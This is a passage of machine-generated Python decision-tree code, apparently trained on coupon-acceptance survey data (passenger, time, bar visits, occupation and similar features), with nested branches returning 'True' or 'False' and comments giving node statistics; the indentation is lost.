if obj[7]<=12:
# {"feature": "Restaurant20to50", "instances": 50, "metric_value": 0.3398, "depth": 10}
if obj[10]>0.0:
# {"feature": "Children", "instances": 42, "metric_value": 0.3558, "depth": 11}
if obj[5]<=0:
# {"feature": "Gender", "instances": 22, "metric_value": 0.2938, "depth": 12}
if obj[3]<=0:
# {"feature": "Direction_same", "instances": 14, "metric_value": 0.3367, "depth": 13}
if obj[11]<=0:
return 'True'
else: return 'True'
elif obj[3]>0:
# {"feature": "Direction_same", "instances": 8, "metric_value": 0.2188, "depth": 13}
if obj[11]<=0:
return 'True'
else: return 'True'
else: return 'True'
elif obj[5]>0:
# {"feature": "Gender", "instances": 20, "metric_value": 0.4182, "depth": 12}
if obj[3]<=0:
# {"feature": "Direction_same", "instances": 11, "metric_value": 0.3967, "depth": 13}
if obj[11]<=0:
return 'True'
else: return 'True'
elif obj[3]>0:
# {"feature": "Direction_same", "instances": 9, "metric_value": 0.4444, "depth": 13}
if obj[11]<=0:
return 'True'
else: return 'True'
else: return 'True'
else: return 'True'
elif obj[10]<=0.0:
# {"feature": "Gender", "instances": 8, "metric_value": 0.1667, "depth": 11}
if obj[3]>0:
return 'True'
elif obj[3]<=0:
# {"feature": "Children", "instances": 3, "metric_value": 0.3333, "depth": 12}
if obj[5]<=0:
# {"feature": "Direction_same", "instances": 2, "metric_value": 0.5, "depth": 13}
if obj[11]<=0:
return 'False'
else: return 'False'
elif obj[5]>0:
return 'True'
else: return 'True'
else: return 'True'
else: return 'True'
elif obj[7]>12:
return 'True'
else: return 'True'
else: return 'True'
else: return 'True'
else: return 'True'
elif obj[8]>3.0:
# {"feature": "Occupation", "instances": 62, "metric_value": 0.437, "depth": 6}
if obj[7]<=12:
# {"feature": "Age", "instances": 47, "metric_value": 0.3928, "depth": 7}
if obj[4]>0:
# {"feature": "Gender", "instances": 39, "metric_value": 0.4538, "depth": 8}
if obj[3]<=0:
# {"feature": "Time", "instances": 21, "metric_value": 0.4636, "depth": 9}
if obj[1]>0:
# {"feature": "Education", "instances": 17, "metric_value": 0.4843, "depth": 10}
if obj[6]>2:
# {"feature": "Children", "instances": 12, "metric_value": 0.4861, "depth": 11}
if obj[5]<=0:
# {"feature": "Restaurant20to50", "instances": 12, "metric_value": 0.4861, "depth": 12}
if obj[10]<=4.0:
# {"feature": "Direction_same", "instances": 12, "metric_value": 0.4861, "depth": 13}
if obj[11]<=0:
return 'True'
else: return 'True'
else: return 'True'
else: return 'True'
elif obj[6]<=2:
# {"feature": "Children", "instances": 5, "metric_value": 0.48, "depth": 11}
if obj[5]<=0:
# {"feature": "Restaurant20to50", "instances": 5, "metric_value": 0.48, "depth": 12}
if obj[10]<=1.0:
# {"feature": "Direction_same", "instances": 5, "metric_value": 0.48, "depth": 13}
if obj[11]<=0:
return 'True'
else: return 'True'
else: return 'True'
else: return 'True'
else: return 'True'
elif obj[1]<=0:
# {"feature": "Education", "instances": 4, "metric_value": 0.3333, "depth": 10}
if obj[6]>2:
# {"feature": "Children", "instances": 3, "metric_value": 0.4444, "depth": 11}
if obj[5]<=0:
# {"feature": "Restaurant20to50", "instances": 3, "metric_value": 0.4444, "depth": 12}
if obj[10]<=4.0:
# {"feature": "Direction_same", "instances": 3, "metric_value": 0.4444, "depth": 13}
if obj[11]<=0:
return 'False'
else: return 'False'
else: return 'False'
else: return 'False'
elif obj[6]<=2:
return 'False'
else: return 'False'
else: return 'False'
elif obj[3]>0:
# {"feature": "Education", "instances": 18, "metric_value": 0.3951, "depth": 9}
if obj[6]<=0:
# {"feature": "Time", "instances": 9, "metric_value": 0.3016, "depth": 10}
if obj[1]>0:
# {"feature": "Restaurant20to50", "instances": 7, "metric_value": 0.2286, "depth": 11}
if obj[10]>0.0:
# {"feature": "Children", "instances": 5, "metric_value": 0.32, "depth": 12}
if obj[5]<=0:
# {"feature": "Direction_same", "instances": 5, "metric_value": 0.32, "depth": 13}
if obj[11]<=0:
return 'True'
else: return 'True'
else: return 'True'
elif obj[10]<=0.0:
return 'True'
else: return 'True'
elif obj[1]<=0:
# {"feature": "Restaurant20to50", "instances": 2, "metric_value": 0.0, "depth": 11}
if obj[10]<=0.0:
return 'False'
elif obj[10]>0.0:
return 'True'
else: return 'True'
else: return 'False'
elif obj[6]>0:
# {"feature": "Restaurant20to50", "instances": 9, "metric_value": 0.381, "depth": 10}
if obj[10]>0.0:
# {"feature": "Time", "instances": 7, "metric_value": 0.4762, "depth": 11}
if obj[1]>0:
# {"feature": "Children", "instances": 4, "metric_value": 0.5, "depth": 12}
if obj[5]<=0:
# {"feature": "Direction_same", "instances": 4, "metric_value": 0.5, "depth": 13}
if obj[11]<=0:
return 'True'
else: return 'True'
else: return 'True'
elif obj[1]<=0:
# {"feature": "Children", "instances": 3, "metric_value": 0.4444, "depth": 12}
if obj[5]<=0:
# {"feature": "Direction_same", "instances": 3, "metric_value": 0.4444, "depth": 13}
if obj[11]<=0:
return 'True'
else: return 'True'
else: return 'True'
else: return 'True'
elif obj[10]<=0.0:
return 'True'
else: return 'True'
else: return 'True'
else: return 'True'
elif obj[4]<=0:
return 'True'
else: return 'True'
elif obj[7]>12:
# {"feature": "Time", "instances": 15, "metric_value": 0.3333, "depth": 7}
if obj[1]>0:
# {"feature": "Gender", "instances": 10, "metric_value": 0.4444, "depth": 8}
if obj[3]<=0:
# {"feature": "Age", "instances": 9, "metric_value": 0.4889, "depth": 9}
if obj[4]<=1:
# {"feature": "Children", "instances": 5, "metric_value": 0.48, "depth": 10}
if obj[5]<=0:
# {"feature": "Education", "instances": 5, "metric_value": 0.48, "depth": 11}
if obj[6]<=0:
# {"feature": "Restaurant20to50", "instances": 5, "metric_value": 0.48, "depth": 12}
if obj[10]<=4.0:
# {"feature": "Direction_same", "instances": 5, "metric_value": 0.48, "depth": 13}
if obj[11]<=0:
return 'True'
else: return 'True'
else: return 'True'
else: return 'True'
else: return 'True'
elif obj[4]>1:
# {"feature": "Children", "instances": 4, "metric_value": 0.5, "depth": 10}
if obj[5]<=0:
# {"feature": "Education", "instances": 4, "metric_value": 0.5, "depth": 11}
if obj[6]<=0:
# {"feature": "Restaurant20to50", "instances": 4, "metric_value": 0.5, "depth": 12}
if obj[10]<=1.0:
# {"feature": "Direction_same", "instances": 4, "metric_value": 0.5, "depth": 13}
if obj[11]<=0:
return 'True'
else: return 'True'
else: return 'True'
else: return 'True'
else: return 'True'
else: return 'True'
elif obj[3]>0:
return 'False'
else: return 'False'
elif obj[1]<=0:
return 'False'
else: return 'False'
else: return 'False'
else: return 'True'
else: return 'True'
elif obj[12]>2:
# {"feature": "Passanger", "instances": 435, "metric_value": 0.485, "depth": 4}
if obj[0]>0:
# {"feature": "Education", "instances": 419, "metric_value": 0.484, "depth": 5}
if obj[6]>0:
# {"feature": "Age", "instances": 281, "metric_value": 0.4651, "depth": 6}
if obj[4]<=4:
# {"feature": "Time", "instances": 243, "metric_value": 0.477, "depth": 7}
if obj[1]>0:
# {"feature": "Restaurant20to50", "instances": 211, "metric_value": 0.4925, "depth": 8}
if obj[10]<=2.0:
# {"feature": "Bar", "instances": 189, "metric_value": 0.4944, "depth": 9}
if obj[8]>-1.0:
# {"feature": "Occupation", "instances": 187, "metric_value": 0.4977, "depth": 10}
if obj[7]>1:
# {"feature": "Children", "instances": 145, "metric_value": 0.4994, "depth": 11}
if obj[5]<=0:
# {"feature": "Gender", "instances": 87, "metric_value": 0.4994, "depth": 12}
if obj[3]<=0:
# {"feature": "Direction_same", "instances": 50, "metric_value": 0.4992, "depth": 13}
if obj[11]<=0:
return 'True'
else: return 'True'
elif obj[3]>0:
# {"feature": "Direction_same", "instances": 37, "metric_value": 0.4996, "depth": 13}
if obj[11]<=0:
return 'True'
else: return 'True'
else: return 'True'
elif obj[5]>0:
# {"feature": "Gender", "instances": 58, "metric_value": 0.4986, "depth": 12}
if obj[3]>0:
# {"feature": "Direction_same", "instances": 34, "metric_value": 0.5, "depth": 13}
if obj[11]<=0:
return 'False'
else: return 'False'
elif obj[3]<=0:
# {"feature": "Direction_same", "instances": 24, "metric_value": 0.4965, "depth": 13}
if obj[11]<=0:
return 'False'
else: return 'False'
else: return 'False'
else: return 'False'
elif obj[7]<=1:
# {"feature": "Children", "instances": 42, "metric_value": 0.4694, "depth": 11}
if obj[5]<=0:
# {"feature": "Gender", "instances": 28, "metric_value": 0.4579, "depth": 12}
if obj[3]>0:
# {"feature": "Direction_same", "instances": 15, "metric_value": 0.4444, "depth": 13}
if obj[11]<=0:
return 'False'
else: return 'False'
elif obj[3]<=0:
# {"feature": "Direction_same", "instances": 13, "metric_value": 0.4734, "depth": 13}
if obj[11]<=0:
return 'False'
else: return 'False'
else: return 'False'
elif obj[5]>0:
# {"feature": "Gender", "instances": 14, "metric_value": 0.4615, "depth": 12}
if obj[3]>0:
# {"feature": "Direction_same", "instances": 13, "metric_value": 0.497, "depth": 13}
if obj[11]<=0:
return 'True'
else: return 'True'
elif obj[3]<=0:
return 'True'
else: return 'True'
else: return 'True'
else: return 'False'
elif obj[8]<=-1.0:
return 'False'
else: return 'False'
elif obj[10]>2.0:
# {"feature": "Children", "instances": 22, "metric_value": 0.3545, "depth": 9}
if obj[5]<=0:
# {"feature": "Bar", "instances": 12, "metric_value": 0.3714, "depth": 10}
if obj[8]<=2.0:
# {"feature": "Occupation", "instances": 7, "metric_value": 0.2857, "depth": 11}
if obj[7]>6:
# {"feature": "Gender", "instances": 4, "metric_value": 0.5, "depth": 12}
if obj[3]<=0:
# {"feature": "Direction_same", "instances": 2, "metric_value": 0.5, "depth": 13}
if obj[11]<=0:
return 'False'
else: return 'False'
elif obj[3]>0:
# {"feature": "Direction_same", "instances": 2, "metric_value": 0.5, "depth": 13}
if obj[11]<=0:
return 'False'
else: return 'False'
else: return 'False'
elif obj[7]<=6:
return 'True'
else: return 'True'
elif obj[8]>2.0:
# {"feature": "Occupation", "instances": 5, "metric_value": 0.3, "depth": 11}
if obj[7]<=1:
# {"feature": "Gender", "instances": 4, "metric_value": 0.375, "depth": 12}
if obj[3]<=0:
# {"feature": "Direction_same", "instances": 4, "metric_value": 0.375, "depth": 13}
if obj[11]<=0:
return 'False'
else: return 'False'
else: return 'False'
elif obj[7]>1:
return 'False'
else: return 'False'
else: return 'False'
elif obj[5]>0:
# {"feature": "Bar", "instances": 10, "metric_value": 0.0, "depth": 10}
if obj[8]<=3.0:
return 'False'
elif obj[8]>3.0:
return 'True'
else: return 'True'
else: return 'False'
else: return 'False'
elif obj[1]<=0:
# {"feature": "Occupation", "instances": 32, "metric_value": 0.2983, "depth": 8}
if obj[7]<=9:
# {"feature": "Bar", "instances": 22, "metric_value": 0.3545, "depth": 9}
if obj[8]<=1.0:
# {"feature": "Children", "instances": 12, "metric_value": 0.3714, "depth": 10}
if obj[5]<=0:
# {"feature": "Restaurant20to50", "instances": 7, "metric_value": 0.3429, "depth": 11}
if obj[10]<=1.0:
# {"feature": "Gender", "instances": 5, "metric_value": 0.4667, "depth": 12}
if obj[3]>0:
# {"feature": "Direction_same", "instances": 3, "metric_value": 0.4444, "depth": 13}
if obj[11]<=0:
return 'True'
else: return 'True'
elif obj[3]<=0:
# {"feature": "Direction_same", "instances": 2, "metric_value": 0.5, "depth": 13}
if obj[11]<=0:
return 'False'
else: return 'False'
else: return 'False'
elif obj[10]>1.0:
return 'True'
else: return 'True'
elif obj[5]>0:
# {"feature": "Gender", "instances": 5, "metric_value": 0.2, "depth": 11}
if obj[3]<=0:
return 'False'
elif obj[3]>0:
# {"feature": "Restaurant20to50", "instances": 2, "metric_value": 0.5, "depth": 12}
if obj[10]<=2.0:
# {"feature": "Direction_same", "instances": 2, "metric_value": 0.5, "depth": 13}
if obj[11]<=0:
return 'False'
else: return 'False'
else: return 'False'
else: return 'False'
else: return 'False'
elif obj[8]>1.0:
# {"feature": "Gender", "instances": 10, "metric_value": 0.15, "depth": 10}
if obj[3]>0:
return 'False'
elif obj[3]<=0:
# {"feature": "Restaurant20to50", "instances": 4, "metric_value": 0.25, "depth": 11}
if obj[10]<=0.0:
return 'False'
elif obj[10]>0.0:
# {"feature": "Children", "instances": 2, "metric_value": 0.5, "depth": 12}
if obj[5]<=0:
# {"feature": "Direction_same", "instances": 2, "metric_value": 0.5, "depth": 13}
if obj[11]<=0:
return 'True'
else: return 'True'
else: return 'True'
else: return 'True'
else: return 'False'
else: return 'False'
elif obj[7]>9:
return 'False'
else: return 'False'
else: return 'False'
elif obj[4]>4:
# {"feature": "Occupation", "instances": 38, "metric_value": 0.2545, "depth": 7}
if obj[7]<=7:
# {"feature": "Time", "instances": 21, "metric_value": 0.0833, "depth": 8}
if obj[1]<=1:
return 'False'
elif obj[1]>1:
# {"feature": "Bar", "instances": 8, "metric_value": 0.1667, "depth": 9}
if obj[8]<=0.0:
return 'False'
elif obj[8]>0.0:
# {"feature": "Children", "instances": 3, "metric_value": 0.3333, "depth": 10}
if obj[5]<=0:
# {"feature": "Gender", "instances": 2, "metric_value": 0.5, "depth": 11}
if obj[3]<=1:
# {"feature": "Restaurant20to50", "instances": 2, "metric_value": 0.5, "depth": 12}
if obj[10]<=1.0:
# {"feature": "Direction_same", "instances": 2, "metric_value": 0.5, "depth": 13}
if obj[11]<=0:
return 'True'
else: return 'True'
else: return 'True'
else: return 'True'
elif obj[5]>0:
return 'False'
else: return 'False'
else: return 'False'
else: return 'False'
elif obj[7]>7:
# {"feature": "Time", "instances": 17, "metric_value": 0.4412, "depth": 8}
if obj[1]<=1:
# {"feature": "Gender", "instances": 16, "metric_value": 0.4295, "depth": 9}
if obj[3]<=0:
# {"feature": "Bar", "instances": 13, "metric_value": 0.3487, "depth": 10}
if obj[8]<=1.0:
# {"feature": "Children", "instances": 10, "metric_value": 0.1778, "depth": 11}
if obj[5]>0:
# {"feature": "Restaurant20to50", "instances": 9, "metric_value": 0.1778, "depth": 12}
if obj[10]>1.0:
# {"feature": "Direction_same", "instances": 5, "metric_value": 0.32, "depth": 13}
if obj[11]<=0:
return 'False'
else: return 'False'
elif obj[10]<=1.0:
return 'False'
else: return 'False'
elif obj[5]<=0:
return 'True'
else: return 'True'
elif obj[8]>1.0:
# {"feature": "Children", "instances": 3, "metric_value": 0.0, "depth": 11}
if obj[5]>0:
return 'True'
elif obj[5]<=0:
return 'False'
else: return 'False'
else: return 'True'
elif obj[3]>0:
# {"feature": "Children", "instances": 3, "metric_value": 0.0, "depth": 10}
if obj[5]>0:
return 'True'
elif obj[5]<=0:
return 'False'
else: return 'False'
else: return 'True'
elif obj[1]>1:
return 'False'
else: return 'False'
else: return 'False'
else: return 'False'
elif obj[6]<=0:
# {"feature": "Restaurant20to50", "instances": 138, "metric_value": 0.4841, "depth": 6}
if obj[10]<=3.0:
# {"feature": "Time", "instances": 136, "metric_value": 0.4842, "depth": 7}
if obj[1]>0:
# {"feature": "Age", "instances": 113, "metric_value": 0.4751, "depth": 8}
if obj[4]>0:
# {"feature": "Occupation", "instances": 99, "metric_value": 0.4653, "depth": 9}
if obj[7]<=22:
# {"feature": "Gender", "instances": 98, "metric_value": 0.4612, "depth": 10}
if obj[3]<=0:
# {"feature": "Bar", "instances": 51, "metric_value": 0.4093, "depth": 11}
if obj[8]>0.0:
# {"feature": "Children", "instances": 30, "metric_value": 0.48, "depth": 12}
if obj[5]<=0:
# {"feature": "Direction_same", "instances": 20, "metric_value": 0.48, "depth": 13}
if obj[11]<=0:
return 'True'
else: return 'True'
elif obj[5]>0:
# {"feature": "Direction_same", "instances": 10, "metric_value": 0.48, "depth": 13}
if obj[11]<=0:
return 'True'
else: return 'True'
else: return 'True'
elif obj[8]<=0.0:
# {"feature": "Children", "instances": 21, "metric_value": 0.2963, "depth": 12}
if obj[5]<=0:
# {"feature": "Direction_same", "instances": 18, "metric_value": 0.3457, "depth": 13}
if obj[11]<=0:
return 'True'
else: return 'True'
elif obj[5]>0:
return 'True'
else: return 'True'
else: return 'True'
elif obj[3]>0:
# {"feature": "Bar", "instances": 47, "metric_value": 0.4823, "depth": 11}
if obj[8]<=0.0:
# {"feature": "Children", "instances": 32, "metric_value": 0.5, "depth": 12}
if obj[5]>0:
# {"feature": "Direction_same", "instances": 22, "metric_value": 0.5, "depth": 13}
if obj[11]<=0:
return 'True'
else: return 'True'
elif obj[5]<=0:
# {"feature": "Direction_same", "instances": 10, "metric_value": 0.5, "depth": 13}
if obj[11]<=0:
return 'True'
else: return 'True'
else: return 'True'
elif obj[8]>0.0:
# {"feature": "Children", "instances": 15, "metric_value": 0.44, "depth": 12}
if obj[5]<=0:
# {"feature": "Direction_same", "instances": 10, "metric_value": 0.42, "depth": 13}
if obj[11]<=0:
return 'True'
else: return 'True'
elif obj[5]>0:
# {"feature": "Direction_same", "instances": 5, "metric_value": 0.48, "depth": 13}
if obj[11]<=0:
return 'True'
else: return 'True'
else: return 'True'
else: return 'True'
else: return 'True'
elif obj[7]>22:
return 'False'
else: return 'False'
elif obj[4]<=0:
# {"feature": "Children", "instances": 14, "metric_value": 0.3117, "depth": 9}
if obj[5]<=0:
# {"feature": "Bar", "instances": 11, "metric_value": 0.3636, "depth": 10}
if obj[8]<=3.0:
# {"feature": "Occupation", "instances": 9, "metric_value": 0.4167, "depth": 11}
if obj[7]>1:
# {"feature": "Gender", "instances": 8, "metric_value": 0.3571, "depth": 12}
if obj[3]>0:
# {"feature": "Direction_same", "instances": 7, "metric_value": 0.4082, "depth": 13}
if obj[11]<=0:
return 'False'
else: return 'False'
elif obj[3]<=0:
return 'True'
else: return 'True'
elif obj[7]<=1:
return 'False'
else: return 'False'
elif obj[8]>3.0:
return 'False'
else: return 'False'
elif obj[5]>0:
return 'True'
else: return 'True'
else: return 'False'
elif obj[1]<=0:
# {"feature": "Occupation", "instances": 23, "metric_value": 0.4306, "depth": 8}
if obj[7]>1:
# {"feature": "Bar", "instances": 21, "metric_value": 0.4121, "depth": 9}
if obj[8]<=0.0:
# {"feature": "Age", "instances": 11, "metric_value": 0.3409, "depth": 10}
if obj[4]>1:
# {"feature": "Gender", "instances": 8, "metric_value": 0.3, "depth": 11}
if obj[3]<=0:
# {"feature": "Children", "instances": 5, "metric_value": 0.48, "depth": 12}
if obj[5]<=0:
# {"feature": "Direction_same", "instances": 5, "metric_value": 0.48, "depth": 13}
if obj[11]<=0:
return 'True'
else: return 'True'
else: return 'True'
elif obj[3]>0:
return 'False'
else: return 'False'
elif obj[4]<=1:
return 'True'
else: return 'True'
elif obj[8]>0.0:
# {"feature": "Age", "instances": 10, "metric_value": 0.2667, "depth": 10}
if obj[4]>3:
# {"feature": "Gender", "instances": 6, "metric_value": 0.2667, "depth": 11}
if obj[3]<=0:
# {"feature": "Children", "instances": 5, "metric_value": 0.32, "depth": 12}
if obj[5]<=0:
# {"feature": "Direction_same", "instances": 5, "metric_value": 0.32, "depth": 13}
if obj[11]<=0:
return 'False'
else: return 'False'
else: return 'False'
elif obj[3]>0:
return 'True'
else: return 'True'
elif obj[4]<=3:
return 'False'
else: return 'False'
else: return 'False'
elif obj[7]<=1:
return 'True'
else: return 'True'
else: return 'False'
elif obj[10]>3.0:
return 'False'
else: return 'False'
else: return 'True'
elif obj[0]<=0:
# {"feature": "Children", "instances": 16, "metric_value": 0.1786, "depth": 5}
if obj[5]<=0:
# {"feature": "Age", "instances": 14, "metric_value": 0.0952, "depth": 6}
if obj[4]<=5:
return 'True'
elif obj[4]>5:
# {"feature": "Gender", "instances": 3, "metric_value": 0.0, "depth": 7}
if obj[3]<=0:
return 'True'
elif obj[3]>0:
return 'False'
else: return 'False'
else: return 'True'
elif obj[5]>0:
# {"feature": "Gender", "instances": 2, "metric_value": 0.0, "depth": 6}
if obj[3]<=0:
return 'False'
elif obj[3]>0:
return 'True'
else: return 'True'
else: return 'False'
else: return 'True'
else: return 'False'
elif obj[9]<=0.0:
# {"feature": "Passanger", "instances": 1452, "metric_value": 0.4944, "depth": 3}
if obj[0]<=1:
# {"feature": "Distance", "instances": 925, "metric_value": 0.4846, "depth": 4}
if obj[12]<=1:
# {"feature": "Time", "instances": 498, "metric_value": 0.486, "depth": 5}
if obj[1]>0:
# {"feature": "Bar", "instances": 313, "metric_value": 0.473, "depth": 6}
if obj[8]<=0.0:
# {"feature": "Direction_same", "instances": 169, "metric_value": 0.4379, "depth": 7}
if obj[11]>0:
# {"feature": "Occupation", "instances": 94, "metric_value": 0.4613, "depth": 8}
if obj[7]>3:
# {"feature": "Age", "instances": 63, "metric_value": 0.4959, "depth": 9}
if obj[4]>0:
# {"feature": "Restaurant20to50", "instances": 55, "metric_value": 0.4902, "depth": 10}
if obj[10]>-1.0:
# {"feature": "Education", "instances": 54, "metric_value": 0.4967, "depth": 11}
if obj[6]<=3:
# {"feature": "Gender", "instances": 51, "metric_value": 0.4983, "depth": 12}
if obj[3]<=0:
# {"feature": "Children", "instances": 32, "metric_value": 0.498, "depth": 13}
if obj[5]<=0:
return 'False'
elif obj[5]>0:
return 'False'
else: return 'False'
elif obj[3]>0:
# {"feature": "Children", "instances": 19, "metric_value": 0.4962, "depth": 13}
if obj[5]<=0:
return 'False'
elif obj[5]>0:
return 'True'
else: return 'True'
else: return 'True'
elif obj[6]>3:
# {"feature": "Gender", "instances": 3, "metric_value": 0.3333, "depth": 12}
if obj[3]>0:
# {"feature": "Children", "instances": 2, "metric_value": 0.0, "depth": 13}
if obj[5]<=0:
return 'True'
elif obj[5]>0:
return 'False'
else: return 'False'
elif obj[3]<=0:
return 'False'
else: return 'False'
else: return 'False'
elif obj[10]<=-1.0:
return 'True'
else: return 'True'
elif obj[4]<=0:
# {"feature": "Restaurant20to50", "instances": 8, "metric_value": 0.3571, "depth": 10}
if obj[10]>-1.0:
# {"feature": "Gender", "instances": 7, "metric_value": 0.381, "depth": 11}
if obj[3]<=0:
# {"feature": "Education", "instances": 6, "metric_value": 0.4, "depth": 12}
if obj[6]>0:
# {"feature": "Children", "instances": 5, "metric_value": 0.48, "depth": 13}
if obj[5]<=1:
return 'True'
else: return 'True'
elif obj[6]<=0:
return 'True'
else: return 'True'
elif obj[3]>0:
return 'True'
else: return 'True'
elif obj[10]<=-1.0:
return 'False'
else: return 'False'
else: return 'True'
elif obj[7]<=3:
# {"feature": "Gender", "instances": 31, "metric_value": 0.3632, "depth": 9}
if obj[3]>0:
# {"feature": "Education", "instances": 27, "metric_value": 0.4044, "depth": 10}
if obj[6]<=1:
# {"feature": "Age", "instances": 17, "metric_value": 0.3557, "depth": 11}
if obj[4]>0:
# {"feature": "Restaurant20to50", "instances": 14, "metric_value": 0.3214, "depth": 12}
if obj[10]<=1.0:
# {"feature": "Children", "instances": 12, "metric_value": 0.375, "depth": 13}
if obj[5]>0:
return 'True'
elif obj[5]<=0:
return 'True'
else: return 'True'
elif obj[10]>1.0:
return 'True'
else: return 'True'
elif obj[4]<=0:
# {"feature": "Children", "instances": 3, "metric_value": 0.4444, "depth": 12}
if obj[5]<=0:
# {"feature": "Restaurant20to50", "instances": 3, "metric_value": 0.4444, "depth": 13}
if obj[10]<=2.0:
return 'True'
else: return 'True'
else: return 'True'
else: return 'True'
elif obj[6]>1:
# {"feature": "Age", "instances": 10, "metric_value": 0.4, "depth": 11}
if obj[4]>1:
# {"feature": "Children", "instances": 8, "metric_value": 0.5, "depth": 12}
if obj[5]<=0:
# {"feature": "Restaurant20to50", "instances": 8, "metric_value": 0.5, "depth": 13}
if obj[10]<=0.0:
return 'False'
else: return 'False'
else: return 'False'
elif obj[4]<=1:
return 'True'
else: return 'True'
else: return 'True'
elif obj[3]<=0:
return 'True'
else: return 'True'
else: return 'True'
elif obj[11]<=0:
# {"feature": "Education", "instances": 75, "metric_value": 0.3407, "depth": 8}
if obj[6]>0:
# {"feature": "Age", "instances": 40, "metric_value": 0.2034, "depth": 9}
if obj[4]<=4:
# {"feature": "Restaurant20to50", "instances": 34, "metric_value": 0.1576, "depth": 10}
if obj[10]<=1.0:
# {"feature": "Gender", "instances": 28, "metric_value": 0.186, "depth": 11}
if obj[3]>0:
# {"feature": "Children", "instances": 16, "metric_value": 0.1071, "depth": 12}
if obj[5]>0:
return 'True'
elif obj[5]<=0:
# {"feature": "Occupation", "instances": 7, "metric_value": 0.2143, "depth": 13}
if obj[7]<=2:
return 'True'
elif obj[7]>2:
return 'True'
else: return 'True'
else: return 'True'
elif obj[3]<=0:
# {"feature": "Children", "instances": 12, "metric_value": 0.2333, "depth": 12}
if obj[5]<=0:
# {"feature": "Occupation", "instances": 10, "metric_value": 0.1333, "depth": 13}
if obj[7]<=6:
return 'True'
elif obj[7]>6:
return 'True'
else: return 'True'
elif obj[5]>0:
# {"feature": "Occupation", "instances": 2, "metric_value": 0.0, "depth": 13}
if obj[7]<=6:
return 'False'
elif obj[7]>6:
return 'True'
else: return 'True'
else: return 'False'
else: return 'True'
elif obj[10]>1.0:
return 'True'
else: return 'True'
elif obj[4]>4:
# {"feature": "Restaurant20to50", "instances": 6, "metric_value": 0.0, "depth": 10}
if obj[10]>1.0:
return 'True'
elif obj[10]<=1.0:
return 'False'
else: return 'False'
else: return 'True'
elif obj[6]<=0:
# {"feature": "Occupation", "instances": 35, "metric_value": 0.4573, "depth": 9}
if obj[7]>4:
# {"feature": "Age", "instances": 22, "metric_value": 0.3743, "depth": 10}
if obj[4]>1:
# {"feature": "Gender", "instances": 17, "metric_value": 0.4471, "depth": 11}
if obj[3]<=0:
# {"feature": "Children", "instances": 12, "metric_value": 0.4815, "depth": 12}
if obj[5]<=0:
# {"feature": "Restaurant20to50", "instances": 9, "metric_value": 0.4921, "depth": 13}
if obj[10]>0.0:
return 'True'
elif obj[10]<=0.0:
return 'False'
else: return 'False'
elif obj[5]>0:
# {"feature": "Restaurant20to50", "instances": 3, "metric_value": 0.4444, "depth": 13}
if obj[10]<=1.0:
return 'False'
else: return 'False'
else: return 'False'
elif obj[3]>0:
# {"feature": "Children", "instances": 5, "metric_value": 0.2667, "depth": 12}
if obj[5]<=0:
# {"feature": "Restaurant20to50", "instances": 3, "metric_value": 0.0, "depth": 13}
if obj[10]<=0.0:
return 'True'
elif obj[10]>0.0:
return 'False'
else: return 'False'
elif obj[5]>0:
return 'True'
else: return 'True'
else: return 'True'
elif obj[4]<=1:
return 'True'
else: return 'True'
elif obj[7]<=4:
# {"feature": "Age", "instances": 13, "metric_value": 0.4196, "depth": 10}
if obj[4]>0:
# {"feature": "Restaurant20to50", "instances": 11, "metric_value": 0.4364, "depth": 11}
if obj[10]>0.0:
# {"feature": "Gender", "instances": 10, "metric_value": 0.4667, "depth": 12}
if obj[3]>0:
# {"feature": "Children", "instances": 6, "metric_value": 0.4444, "depth": 13}
if obj[5]<=1:
return 'True'
else: return 'True'
elif obj[3]<=0:
# {"feature": "Children", "instances": 4, "metric_value": 0.5, "depth": 13}
if obj[5]<=0:
return 'False'
else: return 'False'
else: return 'False'
elif obj[10]<=0.0:
return 'False'
else: return 'False'
elif obj[4]<=0:
return 'False'
else: return 'False'
else: return 'False'
else: return 'True'
else: return 'True'
elif obj[8]>0.0:
# {"feature": "Occupation", "instances": 144, "metric_value": 0.4721, "depth": 7}
if obj[7]<=20:
# {"feature": "Age", "instances": 136, "metric_value": 0.4906, "depth": 8}
if obj[4]>1:
# {"feature": "Education", "instances": 78, "metric_value": 0.4521, "depth": 9}
if obj[6]>1:
# {"feature": "Children", "instances": 58, "metric_value": 0.4733, "depth": 10}
if obj[5]<=0:
# {"feature": "Restaurant20to50", "instances": 41, "metric_value": 0.4758, "depth": 11}
if obj[10]>0.0:
# {"feature": "Gender", "instances": 26, "metric_value": 0.4567, "depth": 12}
if obj[3]>0:
# {"feature": "Direction_same", "instances": 16, "metric_value": 0.4286, "depth": 13}
if obj[11]<=0:
return 'True'
elif obj[11]>0:
return 'True'
else: return 'True'
elif obj[3]<=0:
# {"feature": "Direction_same", "instances": 10, "metric_value": 0.5, "depth": 13}
if obj[11]<=0:
return 'True'
elif obj[11]>0:
return 'False'
else: return 'False'
else: return 'False'
elif obj[10]<=0.0:
# {"feature": "Direction_same", "instances": 15, "metric_value": 0.4778, "depth": 12}
if obj[11]>0:
# {"feature": "Gender", "instances": 12, "metric_value": 0.4857, "depth": 13}
if obj[3]>0:
return 'False'
elif obj[3]<=0:
return 'False'
else: return 'False'
elif obj[11]<=0:
# {"feature": "Gender", "instances": 3, "metric_value": 0.3333, "depth": 13}
if obj[3]<=0:
return 'False'
elif obj[3]>0:
return 'False'
else: return 'False'
else: return 'False'
else: return 'False'
elif obj[5]>0:
# {"feature": "Direction_same", "instances": 17, "metric_value": 0.3644, "depth": 11}
if obj[11]<=0:
# {"feature": "Gender", "instances": 9, "metric_value": 0.4444, "depth": 12}
if obj[3]<=0:
# {"feature": "Restaurant20to50", "instances": 6, "metric_value": 0.3333, "depth": 13}
if obj[10]>1.0:
return 'False'
elif obj[10]<=1.0:
return 'False'
else: return 'False'
elif obj[3]>0:
# {"feature": "Restaurant20to50", "instances": 3, "metric_value": 0.3333, "depth": 13}
if obj[10]>1.0:
return 'True'
elif obj[10]<=1.0:
return 'True'
else: return 'True'
else: return 'True'
elif obj[11]>0:
# {"feature": "Restaurant20to50", "instances": 8, "metric_value": 0.2, "depth": 12}
if obj[10]<=1.0:
# {"feature": "Gender", "instances": 5, "metric_value": 0.3, "depth": 13}
if obj[3]>0:
return 'False'
elif obj[3]<=0:
return 'False'
else: return 'False'
elif obj[10]>1.0:
return 'False'
else: return 'False'
else: return 'False'
else: return 'False'
elif obj[6]<=1:
# {"feature": "Children", "instances": 20, "metric_value": 0.3048, "depth": 10}
if obj[5]<=0:
# {"feature": "Restaurant20to50", "instances": 14, "metric_value": 0.2143, "depth": 11}
if obj[10]<=1.0:
# {"feature": "Direction_same", "instances": 8, "metric_value": 0.3333, "depth": 12}
